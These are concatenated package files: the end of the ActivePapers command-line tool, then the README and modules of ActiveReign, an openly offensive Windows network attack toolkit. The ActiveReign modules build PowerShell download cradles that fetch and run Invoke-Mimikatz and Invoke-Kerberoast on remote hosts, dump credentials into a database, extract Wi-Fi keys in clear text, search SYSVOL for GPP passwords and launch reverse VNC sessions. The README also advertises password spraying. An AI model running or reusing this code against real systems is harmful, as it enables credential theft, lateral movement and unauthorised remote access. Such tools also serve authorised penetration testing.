paper = activepapers.storage.ActivePaper(paper, 'r+')
paper.import_module(module)
paper.close()
def run(paper, codelet, debug, profile, checkin):
paper = get_paper(paper)
with activepapers.storage.ActivePaper(paper, 'r+') as paper:
if checkin:
for root, dirs, files in os.walk('code'):
for f in files:
filename = os.path.join(root, f)
try:
update_from_file(paper, filename)
except ValueError as exc:
sys.stderr.write(exc.args[0] + '\n')
try:
if profile is None:
exc = paper.run_codelet(codelet, debug)
else:
import cProfile, pstats
pr = cProfile.Profile()
pr.enable()
exc = paper.run_codelet(codelet, debug)
pr.disable()
ps = pstats.Stats(pr)
ps.dump_stats(profile)
except KeyError:
sys.stderr.write("Codelet %s does not exist\n" % codelet)
raise CLIExit
if exc is not None:
sys.stderr.write(exc)
def _find_calclet_for_dummy_or_stale_item(paper_name):
paper = activepapers.storage.ActivePaper(paper_name, 'r')
deps = paper.dependency_hierarchy()
next(deps) # the first set has no dependencies
calclet = None
item_name = None
for item_set in deps:
for item in item_set:
if paper.is_dummy(item) or paper.is_stale(item):
item_name = item.name
calclet = item.attrs['ACTIVE_PAPER_GENERATING_CODELET']
break
# We must del item_set to prevent h5py from crashing when the
# file is closed. Presumably there are HDF5 handles being freed
# as a consequence of the del.
del item_set
if calclet is not None:
break
paper.close()
return calclet, item_name
def update(paper, verbose):
paper_name = get_paper(paper)
while True:
calclet, item_name = _find_calclet_for_dummy_or_stale_item(paper_name)
if calclet is None:
break
if verbose:
sys.stdout.write("Dataset %s is stale or dummy, running %s\n"
% (item_name, calclet))
sys.stdout.flush()
paper = activepapers.storage.ActivePaper(paper_name, 'r+')
paper.run_codelet(calclet)
paper.close()
def checkin(paper, type, file, force, dry_run):
paper = get_paper(paper)
paper = activepapers.storage.ActivePaper(paper, 'r+')
cwd = os.path.abspath(os.getcwd())
for filename in file:
filename = os.path.abspath(filename)
if not filename.startswith(cwd):
sys.stderr.write("File %s is not in the working directory\n"
% filename)
raise CLIExit
filename = filename[len(cwd)+1:]
def update(filename):
try:
update_from_file(paper, filename, type, force, dry_run)
except ValueError as exc:
sys.stderr.write(exc.args[0] + '\n')
if os.path.isdir(filename):
for root, dirs, files in os.walk(filename):
for f in files:
update(os.path.join(root, f))
else:
update(filename)
paper.close()
def checkout(paper, type, pattern, dry_run):
paper = get_paper(paper)
paper = activepapers.storage.ActivePaper(paper, 'r')
pattern = process_patterns(pattern)
for item in paper.iter_items():
name = item.name[1:] # remove initial slash
dtype = datatype(item)
if pattern and \
not any(p.match(name) for p in pattern):
continue
if type is not None and dtype != type:
continue
try:
extract_to_file(paper, item, directory=os.getcwd())
except ValueError:
sys.stderr.write("Skipping %s: data type %s not extractable\n"
% (item.name, datatype(item)))
paper.close()
def ln(paper, reference, name):
ref_parts = reference.split(':')
if len(ref_parts) != 3:
sys.stderr.write('Invalid reference %s\n' % reference)
raise CLIExit
ref_type, ref_name, ref_path = ref_parts
with activepapers.storage.ActivePaper(get_paper(paper), 'r+') as paper:
if ref_path == '':
ref_path = None
paper.create_ref(name, ref_type + ':' + ref_name, ref_path)
def cp(paper, reference, name):
ref_parts = reference.split(':')
if len(ref_parts) != 3:
sys.stderr.write('Invalid reference %s\n' % reference)
raise CLIExit
ref_type, ref_name, ref_path = ref_parts
with activepapers.storage.ActivePaper(get_paper(paper), 'r+') as paper:
if ref_path == '':
ref_path = None
paper.create_copy(name, ref_type + ':' + ref_name, ref_path)
def refs(paper, verbose):
paper = get_paper(paper)
paper = activepapers.storage.ActivePaper(paper, 'r')
refs = paper.external_references()
paper.close()
sorted_refs = sorted(refs.keys())
for ref in sorted_refs:
sys.stdout.write(ref.decode('utf-8') + '\n')
if verbose:
links, copies = refs[ref]
if links:
sys.stdout.write(" links:\n")
for l in links:
sys.stdout.write(" %s\n" % l)
if copies:
sys.stdout.write(" copies:\n")
for c in copies:
sys.stdout.write(" %s\n" % c)
def edit(paper, dataset):
editor = os.getenv("EDITOR", "vi")
paper_name = get_paper(paper)
with tempdir.TempDir() as t:
paper = activepapers.storage.ActivePaper(paper_name, 'r')
ds = paper.file[dataset]
try:
filename = extract_to_file(paper, ds, directory=str(t))
except ValueError as exc:
sys.stderr.write(exc.args[0] + '\n')
raise CLIExit
finally:
paper.close()
ret = subprocess.call([editor, filename])
if ret == 0:
paper = activepapers.storage.ActivePaper(paper_name, 'r+')
try:
update_from_file(paper, filename,
dataset_name=dataset, create_new=False)
finally:
paper.close()
def console(paper, modify):
import code
paper = get_paper(paper)
paper = activepapers.storage.ActivePaper(paper, 'r+' if modify else 'r')
data = paper.data
environment = {'data': paper.data}
code.interact(banner = "ActivePapers interactive console",
local = environment)
paper.close()
def ipython(paper, modify):
import IPython
paper = get_paper(paper)
paper = activepapers.storage.ActivePaper(paper, 'r+' if modify else 'r')
data = paper.data
IPython.embed()
paper.close() | ActivePapers.Py | /ActivePapers.Py-0.2.2.tar.gz/ActivePapers.Py-0.2.2/lib/activepapers/cli.py | cli.py |
# ActiveReign
<p align="center">
<img src="https://user-images.githubusercontent.com/13889819/62736481-6f7e7880-b9fb-11e9-92d6-47b650fdb84b.png"/>
<br>
<img src="https://img.shields.io/badge/Python-3.7-blue.svg"/>
<img src="https://img.shields.io/badge/License-GPLv3-green.svg">
<a href="https://www.youtube.com/channel/UC6-HLpd0rpPXmpJIhED8qTw">
<img src="https://img.shields.io/badge/Demo-Youtube-red.svg"/></a>
<a href="https://twitter.com/intent/follow?screen_name=m8r0wn">
<img src="https://img.shields.io/twitter/follow/m8r0wn?style=social&logo=twitter" alt="follow on Twitter"></a>
</p>
### Background
A while back I was challenged to write a discovery tool with Python3 that could automate the process of finding sensitive information on network file shares. After writing the entire tool with pysmb, and adding features such as the ability to open and scan docx an xlsx files, I slowly started adding functionality from the awesome [Impacket](https://github.com/SecureAuthCorp/impacket) library; just simple features I wanted to see in an internal penetration testing tool. The more I added, the more it looked like a Python3 rewrite of [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) created from scratch.
If you are doing a direct comparison, [CME](https://github.com/byt3bl33d3r/CrackMapExec) is an amazing tool that has way more features than currently implement here. However, I added a few new features and modifications that may come in handy during an assessment.
### For more documentation checkout the project [wiki](https://github.com/m8r0wn/ActiveReign/wiki)
### Operational Modes
* db - Query or insert values in to the ActiveReign database
* enum - System enumeration & module execution
* shell - Spawn a simulated shell on the target system and perform command execution
* spray - Domain password spraying and brute force
* query - Perform LDAP queries on the domain
### Key Features
* Automatically extract domain information via LDAP and incorporate into network enumeration.
* Perform Domain password spraying using LDAP to remove users close to lockout thresholds.
* Local and remote command execution, for use on multiple starting points throughout the network.
* Simulated interactive shell on target system, with file upload and download capabilities.
* Data discovery capable of scanning xlsx and docx files.
* Various modules to add and extend capabilities.
### Acknowledgments
There were many intended and unintended contributors that made this project possible. If I am missing any, I apologize, it was in no way intentional. Feel free to contact me and we can make sure they get the credit they deserve ASAP!
* [@byt3bl33d3r](https://github.com/byt3bl33d3r) - [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
* [@SecureAuthCorp](https://github.com/SecureAuthCorp) - [Impacket](https://github.com/SecureAuthCorp/impacket)
* [@the-useless-one](https://github.com/the-useless-one) - [pywerview](https://github.com/the-useless-one/pywerview)
* [@dirkjanm](https://github.com/dirkjanm) - [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
### Final Thoughts
Writing this tool and testing on a variety of networks/systems has taught me that execution method matters, and depends on the configuration of the system. If a specific module or feature does not work, determine if it is actually the program, target system, configuration, or even network placement before creating an issue.
To help this investigation process, I have created a ```test_execution``` module to run against a system with known admin privileges. This will cycle through all all execution methods and provide a status report to determine the best method to use:
```bash
$ activereign enum -u administrator -p Password123 --local-auth -M test_execution 192.168.1.1
[*] Lockout Tracker Threshold extracted from database: 5
[*] Enum Authentication \administrator (Password: P****) (Hash: False)
[+] DC01 192.168.1.1 ENUM Windows Server 2008 R2 Standard 7601 Service Pack 1 (Domain: DEMO) (Signing: True) (SMBv1: True) (Adm!n)
[*] DC01 192.168.1.1 TEST_EXECUTION Testing execution methods
[*] DC01 192.168.1.1 TEST_EXECUTION Execution Method: WMIEXEC Fileless: SUCCESS Remote (Defualt): SUCCESS
[*] DC01 192.168.1.1 TEST_EXECUTION Execution Method: SMBEXEC Fileless: SUCCESS Remote (Defualt): SUCCESS
[*] DC01 192.168.1.1 TEST_EXECUTION Execution Method: ATEXEC Fileless: SUCCESS Remote (Defualt): SUCCESS
[*] DC01 192.168.1.1 TEST_EXECUTION Execution Method: WINRM Fileless: N/A Remote (Defualt): SUCCESS
``` | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/README.md | README.md |
import os
import sys
import logging
STYLE = {
'None' : '0',
'bold' : '1',
'disable' : '2',
'underline' : '4',
'blink' : '5',
'reverse' : '7',
'invisible' : '8',
'strike' : '9',
}
COLOR = {
'None' : '',
'gray' : ';30',
'red' : ';31',
'green' : ';32',
'yellow': ';33',
'blue' : ';34',
'purple': ';35',
'cyan' : ';36',
'white' : ';39',
}
HIGHLIGHT = {
'None' : '',
'black' : ';40',
'red' : ';41',
'green' : ';42',
'orange': ';43',
'blue' : ';44',
'purple': ';45',
'cyan' : ';46',
'gray' : ';47',
}
class AR3Adapter(logging.LoggerAdapter):
__FORMATTER = {
0: '{:<28}', # Hostname
1: '{:<16}', # IP
2: '{:<28} ', # Data label
3: '{:<57}', # os/data
4: '{:<20}', # Domain/data cont.
5: '{:<17}', # Signing
6: '{:<14}', # SMBv1
}
def __init__(self, logger_name='ar3'):
self.logger = logging.getLogger(logger_name)
def msg_spacing(self, data):
if type(data) != list:
return data
tmp_data = ''
spacer = 0
for value in data:
try:
if spacer == 2:
tmp_data += (self.__FORMATTER[spacer].format(highlight(value, color='blue', style='bold')) + ' ')
else:
tmp_data += (self.__FORMATTER[spacer].format(value) + ' ')
except Exception as e:
tmp_data += '{} '.format(value)
spacer += 1
return tmp_data
def process(self, msg, kwargs, color='blue', highlight='None', style='bold', bullet=''):
# Backwards compatible with any logging methods not defined
if not bullet:
return msg, kwargs
msg = self.msg_spacing(msg)
return("{}{}\033[0m {}".format(code_gen(style, color, highlight), bullet, msg), kwargs)
def info(self, msg, *args, **kwargs):
msg, kwargs = self.process(msg, kwargs, color='blue', highlight='None', style='bold', bullet='[*]')
self.logger.info(msg, *args, **kwargs)
def output(self, msg, *args, **kwargs):
self.logger.info(msg, *args, **kwargs)
def success(self, msg, *args, **kwargs):
msg, kwargs = self.process(msg, kwargs, color='green', highlight='None', style='bold', bullet='[+]')
self.logger.info(msg, *args, **kwargs)
def success2(self, msg, *args, **kwargs):
msg, kwargs = self.process(msg, kwargs, color='yellow', highlight='None', style='bold', bullet='[+]')
self.logger.info(msg, *args, **kwargs)
def fail(self, msg, *args, **kwargs):
msg, kwargs = self.process(msg, kwargs, color='red', highlight='None', style='bold', bullet='[-]')
self.logger.info(msg, *args, **kwargs)
def status(self, msg, *args, **kwargs):
msg = self.msg_spacing(msg)
msg = "{}[*] \033[1;30m{}\033[0m".format(code_gen('bold', 'blue', 'None'), msg)
self.logger.info(msg, *args, **kwargs)
def status_success(self, msg, *args, **kwargs):
msg = self.msg_spacing(msg)
msg = "{}[+] \033[1;30m{}\033[0m".format(code_gen('bold', 'green', 'None'), msg)
self.logger.info(msg, *args, **kwargs)
def status_success2(self, msg, *args, **kwargs):
msg = self.msg_spacing(msg)
msg = "{}[+] \033[1;30m{}\033[0m".format(code_gen('bold', 'yellow', 'None'), msg)
self.logger.info(msg, *args, **kwargs)
def status_fail(self, msg, *args, **kwargs):
msg = self.msg_spacing(msg)
msg = "{}[-] \033[1;30m{}\033[0m".format(code_gen('bold', 'red', 'None'), msg)
self.logger.info(msg, *args, **kwargs)
def warning(self, msg, *args, **kwargs):
msg, kwargs = self.process(msg, kwargs, color='purple', highlight='None', style='bold', bullet='[!]')
self.logger.warning(msg, *args, **kwargs)
def verbose(self, msg, *args, **kwargs):
# @TODO At some point create a new log level "verbose" to print failure messages
msg, kwargs = self.process(msg, kwargs, color='red', highlight='None', style='bold', bullet='[-]')
self.logger.debug(msg, *args, **kwargs)
def debug(self, msg, *args, **kwargs):
msg, kwargs = self.process(msg, kwargs, color='cyan', highlight='None', style='bold', bullet='[D]')
self.logger.debug(msg, *args, **kwargs)
def setup_logger(log_level=logging.INFO, logger_name='ar3'):
formatter = logging.Formatter('%(message)s')
StreamHandler = logging.StreamHandler(sys.stdout)
StreamHandler.setFormatter(formatter)
logger = logging.getLogger(logger_name)
logger.propagate = False
logger.addHandler(StreamHandler)
logger.setLevel(log_level)
return AR3Adapter()
def setup_file_logger(workspace, log_name, log_level=logging.INFO, ext='.csv'):
filename = setup_log_file(workspace, log_name, ext)
formatter = logging.Formatter("%(message)s")
fh = logging.FileHandler(filename)
fh.setFormatter(formatter)
logger = logging.getLogger(log_name)
logger.addHandler(fh)
logger.setLevel(log_level)
return logger
def setup_outfile_logger(filename, log_name, log_level=logging.INFO):
# User defined output files, not required under workspace context
formatter = logging.Formatter("%(message)s")
fh = logging.FileHandler(filename)
fh.setFormatter(formatter)
logger = logging.getLogger(log_name)
logger.addHandler(fh)
logger.setLevel(log_level)
return logger
def setup_log_file(workspace, log_name, ext='.csv'):
file_location = os.path.join(os.path.expanduser('~'), '.ar3', 'workspaces', workspace)
if not os.path.exists(file_location):
os.makedirs(file_location)
return '{}/{}{}'.format(file_location, log_name, ext)
def print_args(args, logger):
for k in args.__dict__:
if args.__dict__[k] is not None:
logger.debug(['args.{}'.format(k), '::: {}'.format(args.__dict__[k])])
def code_gen(style, color, highlight):
"""Outside logger adapter to be called from other places, aka highlighting"""
code = '\033[0{}{}{}m'.format(STYLE[style], COLOR[color], HIGHLIGHT[highlight])
return code
def highlight(data, color='blue', style='bold', highlight='None'):
return "{}{}\033[0m".format(code_gen(style, color, highlight), data) | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/logger.py | logger.py |
import logging
import argparse
from sys import exit, argv
from importlib import import_module
from ar3 import logger
from ar3.first_run import *
from ar3.ops.db.db_core import Ar3db
from ar3.loaders.config_loader import ConfigLoader
from ar3.ops.db.arg_parser import db_args, db_arg_mods
from ar3.ops.enum.arg_parser import enum_args, enum_arg_mods
from ar3.ops.spray.arg_parser import spray_args, spray_arg_mods
from ar3.ops.query.arg_parser import query_args, query_arg_mods
from ar3.ops.shell.arg_parser import shell_args, shell_arg_mods
def banner():
VERSION = "v1.0.5"
BANNER = """
_____
/\ _ ({0}) | __ \ ({0})
/ \ ___| |_ ___ _____| |__) |___ _ __ _ _ __
/ /\ \ / __| __| \ \ / / _ \ _ // _ \ |/ _` | '_ \
/ ____ \ (__| |_| |\ V / __/ | \ \ __/ | (_| | | | |
/_/ \_\___|\__|_| \_/ \___|_| \_\___|_|\__, |_| |_|
__/ |
|___/
\033[1;33mA network enumeration and attack toolset\033[1;m
{1}
""".format("\033[1;30mX\033[1;m", VERSION)
return BANNER
def main():
main_parser = argparse.ArgumentParser(description=banner(), formatter_class=argparse.RawTextHelpFormatter, usage=argparse.SUPPRESS)
main_parser._optionals.title = 'Optional Arguments\n\033[1;30m>>-------------------->\033[1;m'
main_parser.add_argument('-D', '--debug', dest="debug", action='store_true', help='Show debug messages & failed login attempts')
main_parser.add_argument('-T', dest='max_threads', type=int, default=55, help='Max number of threads to use')
main_parser.add_argument('--host-max', dest='max_host_threads', type=int, default=20, help='Max threads per host')
main_parser.add_argument('-W', dest='workspace', type=str, default='', required=False, help='Manually set workspace, otherwise defaults to config file')
sub_parser = main_parser.add_subparsers(title=' \nOperational Modes\n\033[1;30m>>-------------------->\033[1;m', dest='mode')
db_args(sub_parser)
enum_args(sub_parser)
shell_args(sub_parser)
spray_args(sub_parser)
query_args(sub_parser)
args = main_parser.parse_args()
if len(argv) <= 2: main_parser.print_help();exit(1)
if args.debug:
log_level = logging.DEBUG
else:
log_level = logging.INFO
# Init console logger
loggers = {}
loggers['console'] = logger.setup_logger(log_level, 'ar3')
# First checks & load config
first_run_check(loggers['console'])
config_obj = ConfigLoader()
if not args.workspace:
setattr(args, 'workspace', config_obj.WORKSPACE)
first_workspace_check(args.workspace, loggers['console'])
# Setup file logger
loggers[args.mode] = logger.setup_file_logger(args.workspace, args.mode)
# Setup secondary loggers - use argv since arg_mods haven't been made yet
if '--spider' in argv:
loggers['spider'] = logger.setup_file_logger(args.workspace, "spider")
if '--gen-relay-list' in argv:
loggers['relay_list'] = logger.setup_outfile_logger(args.gen_relay_list, "relay_list")
# Setup DB
db_obj = Ar3db(args.workspace, loggers['console'], args.debug)
try:
# Start
args = eval("{}_arg_mods(args, db_obj, loggers)".format(args.mode))
if args.debug: logger.print_args(args, loggers['console'])
ops = import_module("ar3.ops.{}".format(args.mode))
ops.main(args, config_obj, db_obj, loggers)
except KeyboardInterrupt:
print("\n[!] Key Event Detected, Closing...")
exit(0)
except Exception as e:
print("[!] ActiveReign Error: {}".format(str(e))) | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/__init__.py | __init__.py |
import re
from ar3.helpers import powershell
from ar3.logger import setup_file_logger
from ar3.helpers.misc import validate_ntlm
from ar3.ops.enum.host_enum import code_execution
from ar3.helpers.misc import get_local_ip, get_filestamp
class InvokeMimikatz():
def __init__(self):
self.name = 'Mimikatz'
self.description = 'Execute PowerSpoits Invoke-Mimikatz.ps1'
self.author = ['@m8r0wn']
self.requires_admin = True
self.exec_methods = ['wmiexec', 'smbexec']
self.args = {
'COMMAND': {
'Description': 'Mimikatz Command to Run',
'Required': False,
'Value': 'privilege::debug sekurlsa::logonpasswords exit'
}
}
def run(self, target, args, smb_con, loggers, config_obj):
logger = loggers['console']
timeout = args.timeout
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Mimikatz'])
try:
# Define Script Source
if args.fileless:
srv_addr = get_local_ip()
script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(srv_addr)
setattr(args, 'timeout', timeout + 60)
else:
script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'
setattr(args, 'timeout', timeout + 25)
logger.debug('Script source: {}'.format(script_location))
# Setup PS1 Script
cmd = """Invoke-Mimikatz -Command \"{}\"""".format(self.args['COMMAND']['Value'])
launcher = powershell.gen_ps_iex_cradle(script_location, cmd)
try:
# Execute
cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
results = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)
# Display Output
if not results:
loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), 'No output returned'])
return
elif args.debug:
for line in results.splitlines():
loggers['console'].debug([smb_con.host, smb_con.ip, self.name.upper(), line])
# Parse results and send creds to db
db_updates = 0
for cred in self.parse_mimikatz(results):
if cred[0] == "hash":
smb_con.db.update_user(cred[2], '', cred[1], cred[3])
loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1],cred[2],cred[3])])
db_updates += 1
elif cred[0] == "plaintext":
smb_con.db.update_user(cred[2], cred[3], cred[1], '')
loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1], cred[2], cred[3])])
db_updates += 1
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])
# write results to file
file_name = 'mimikatz_{}_{}.txt'.format(target, get_filestamp())
tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
tmp_logger.info(results)
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Output saved to: {}".format(file_name)])
except Exception as e:
if str(e) == "list index out of range":
loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), "{} failed".format(self.name)])
else:
loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), str(e)])
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e)))
def uniquify_tuples(self, tuples):
"""
uniquify mimikatz tuples based on the password
cred format- (credType, domain, username, password, hostname, sid)
Stolen from the Empire project.
"""
seen = set()
return [item for item in tuples if
"{}{}{}{}".format(item[0], item[1], item[2], item[3]) not in seen and not seen.add(
"{}{}{}{}".format(item[0], item[1], item[2], item[3]))]
def parse_mimikatz(self, data):
"""
Parse the output from Invoke-Mimikatz to return credential sets.
This was directly stolen from the Empire project as well.
"""
# cred format:
# credType, domain, username, password, hostname, sid
creds = []
# regexes for "sekurlsa::logonpasswords" Mimikatz output
regexes = ["(?s)(?<=msv :).*?(?=tspkg :)", "(?s)(?<=tspkg :).*?(?=wdigest :)",
"(?s)(?<=wdigest :).*?(?=kerberos :)", "(?s)(?<=kerberos :).*?(?=ssp :)",
"(?s)(?<=ssp :).*?(?=credman :)", "(?s)(?<=credman :).*?(?=Authentication Id :)",
"(?s)(?<=credman :).*?(?=mimikatz)"]
hostDomain = ""
domainSid = ""
hostName = ""
lines = data.split("\n")
for line in lines[0:2]:
if line.startswith("Hostname:"):
try:
domain = line.split(":")[1].strip()
temp = domain.split("/")[0].strip()
domainSid = domain.split("/")[1].strip()
hostName = temp.split(".")[0]
hostDomain = ".".join(temp.split(".")[1:])
except:
pass
for regex in regexes:
p = re.compile(regex)
for match in p.findall(data):
lines2 = match.split("\n")
username, domain, password = "", "", ""
for line in lines2:
try:
if "Username" in line:
username = line.split(":", 1)[1].strip()
elif "Domain" in line:
domain = line.split(":", 1)[1].strip()
elif "NTLM" in line or "Password" in line:
password = line.split(":", 1)[1].strip()
except:
pass
if username != "" and password != "" and password != "(null)":
sid = ""
# substitute the FQDN in if it matches
if hostDomain.startswith(domain.lower()):
domain = hostDomain
sid = domainSid
if validate_ntlm(password):
credType = "hash"
else:
credType = "plaintext"
# ignore machine account plaintexts
if not (credType == "plaintext" and username.endswith("$")):
creds.append((credType, domain, username, password, hostName, sid))
if len(creds) == 0:
# check if we have lsadump output to check for krbtgt
# happens on domain controller hashdumps
for x in range(8, 13):
if lines[x].startswith("Domain :"):
domain, sid, krbtgtHash = "", "", ""
try:
domainParts = lines[x].split(":")[1]
domain = domainParts.split("/")[0].strip()
sid = domainParts.split("/")[1].strip()
# substitute the FQDN in if it matches
if hostDomain.startswith(domain.lower()):
domain = hostDomain
sid = domainSid
for x in range(0, len(lines)):
if lines[x].startswith("User : krbtgt"):
krbtgtHash = lines[x + 2].split(":")[1].strip()
break
if krbtgtHash != "":
creds.append(("hash", domain, "krbtgt", krbtgtHash, hostName, sid))
except Exception as e:
pass
if len(creds) == 0:
# check if we get lsadump::dcsync output
if '** SAM ACCOUNT **' in lines:
domain, user, userHash, dcName, sid = "", "", "", "", ""
for line in lines:
try:
if line.strip().endswith("will be the domain"):
domain = line.split("'")[1]
elif line.strip().endswith("will be the DC server"):
dcName = line.split("'")[1].split(".")[0]
elif line.strip().startswith("SAM Username"):
user = line.split(":")[1].strip()
elif line.strip().startswith("Object Security ID"):
parts = line.split(":")[1].strip().split("-")
sid = "-".join(parts[0:-1])
elif line.strip().startswith("Hash NTLM:"):
userHash = line.split(":")[1].strip()
except:
pass
if domain != "" and userHash != "":
creds.append(("hash", domain, user, userHash, dcName, sid))
return self.uniquify_tuples(creds) | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/modules/mimikatz.py | mimikatz.py |
from ar3.helpers import powershell
from ar3.logger import setup_file_logger
from ar3.ops.enum.host_enum import code_execution
from ar3.helpers.misc import get_local_ip, get_filestamp
class InvokeKerberoast():
def __init__(self):
self.name = 'Kerberoast'
self.description = 'Use Empires invoke-kerberoasting module'
self.author = ['@m8r0wn']
self.credit = ['@EmpireProject']
self.requires_admin = True
self.exec_methods = ['wmiexec', 'smbexec', 'atexec']
self.args = {}
def run(self, target, args, smb_con, loggers, config_obj):
logger = loggers['console']
timeout = args.timeout
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Kerberoast'])
try:
# Define Script Source
if args.fileless:
srv_addr = get_local_ip()
script_location = 'http://{}/Invoke-Kerberoast.ps1'.format(srv_addr)
setattr(args, 'timeout', timeout + 30)
else:
script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'
setattr(args, 'timeout', timeout + 15)
logger.debug('Script source: {}'.format(script_location))
# Setup PS1 Script
launcher = powershell.gen_ps_iex_cradle(script_location, '')
# Execute
cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
x = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)
# Display Output
for line in x.splitlines():
loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), line])
# write results to file
file_name = 'kerberoast_{}_{}.txt'.format(target, get_filestamp())
tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
tmp_logger.info(x)
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Output saved to: {}".format(file_name)])
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e))) | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/modules/invoke_kerberoast.py | invoke_kerberoast.py |
from ar3.ops.enum.host_enum import code_execution
class WifiPasswords():
def __init__(self):
self.name = 'wifi_passwords'
self.description = 'Extract wifi passwords from system'
self.author = ['@m8r0wn']
self.requires_admin = True
self.exec_methods = ['wmiexec', 'smbexec', 'atexec']
self.args = {}
def run(self, target, args, smb_con, loggers, config_obj):
profiles = []
logger = loggers['console']
try:
cmd = 'netsh wlan show profiles'
results = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True).splitlines()
# Quick n dirty error checking...
if len (results) <= 1:
logger.fail([smb_con.host, smb_con.ip, self.name.upper(), "{}: {}".format(self.name, results[0])])
return
# List all profiles
for r in results:
if r.strip().startswith('All User Profile'):
try:
wifi = r.strip().split(":")[1]
profiles.append(wifi.lstrip().rstrip())
except:
pass
# Get clear text passwords
for p in profiles:
try:
cmd = 'netsh wlan show profile name=\"{}\" key=clear'.format(p)
results = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True).splitlines()
for result in results:
if result.split(":")[0].strip() in ['SSID name', 'Authentication', 'Cipher', 'Key Content']:
logger.success([smb_con.host, smb_con.ip, self.name.upper(), result.lstrip()])
loggers[args.mode].info('Wifi_Passwords\t{}\t{}\t{}'.format(smb_con.host, smb_con.ip, result.lstrip()))
except Exception as e:
logger.debug([smb_con.host, smb_con.ip, self.name.upper(), "{}: {}".format(self.name, str(e))])
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e))) | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/modules/wifi_passwords.py | wifi_passwords.py |
from ar3.ops.enum.spider import spider
from ar3.logger import setup_file_logger
class GPP_Password():
def __init__(self):
self.name = 'gpp_password'
self.description = 'Looks for "cpassword" values in SYSVOL'
self.author = ['@m8r0wn']
self.requires_admin = False
self.args = {
'DC': {
'Description' : 'Domain Controller (otherwise provided target will be used)',
'Required' : False,
'Value' : ''
}
}
def run(self, target, args, smb_con, loggers, config_obj):
# Define Target
self.count = 0
if self.args['DC']['Value']:
target = self.args['DC']['Value']
# Create custom spider config
temp_config = config_obj
temp_config.WHITELIST_EXT = ['xml']
temp_config.KEY_EXT = []
temp_config.KEY_WORDS = []
temp_config.REGEX = {"gpp_password": "^.*cpassword=.*$"}
# Override args
setattr(args, 'max_depth', 12)
setattr(args, 'spider', False)
# Create spider logger
loggers['spider'] = setup_file_logger(args.workspace, "spider")
# Start
loggers['console'].info([smb_con.host, smb_con.ip, "GPP_PASSWORD", "Searching \\\\{}\\SYSVOL\\".format(target)])
spider(args, temp_config, loggers, smb_con.db, target, 'SYSVOL')
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Module complete"])
def cpassword_parser(loggers, host, ip, filename, data):
loggers['console'].success([host, ip, "GPP_PASSWORD", "{:<9} : {}".format("File", filename)])
for line in data.split(' '):
if line.startswith(("userName", "newName", "password", "changed", "cpassword")):
try:
tmp = line.split('=')
param = tmp[0]
value = tmp[1].strip('\"')
if param == 'cpassword':
value = cpassword_decrypt(value)
loggers['console'].success([host, ip, "GPP_PASSWORD", "{:<9} : {}".format(param.title(), value)])
except:
pass
def cpassword_decrypt(cpassword):
"""
Sorry no decryption available yet, workin' on it </3
"""
try:
return cpassword
except:
return cpassword | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/modules/gpp_password.py | gpp_password.py |
from ar3.helpers import powershell
from ar3.helpers.misc import get_local_ip
from ar3.ops.enum.host_enum import code_execution
class InvokeVNC():
def __init__(self):
self.name = 'Invoke-VNC'
self.description = 'Load VNC client into memory to create a session on the system'
self.author = ['@m8r0wn']
self.credit = ['@EmpireProject']
self.requires_admin = True
self.exec_methods = ['wmiexec', 'smbexec', 'atexec']
self.args = {
'CONTYPE' : {
'Description' : 'Type of payload to use {reverse, bind}',
'Required' : False,
'Value' : 'reverse'
},
'IPADDRESS' : {
'Description' : 'IP address of VNC listener',
'Required' : False,
'Value' : ''
},
'PORT' : {
'Description' : 'VNC Port',
'Required' : False,
'Value' : '5900'
},
'PASSWORD' : {
'Description' : 'VNC Password (Default: ar3vnc)',
'Required' : False,
'Value' : 'ar3vnc'
}
}
def run(self, target, args, smb_con, loggers, config_obj):
cmd = ''
logger = loggers['console']
timeout = args.timeout
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-VNC'])
try:
# Define Script Source
if args.fileless:
srv_addr = get_local_ip()
script_location = 'http://{}/Invoke-Vnc.ps1'.format(srv_addr)
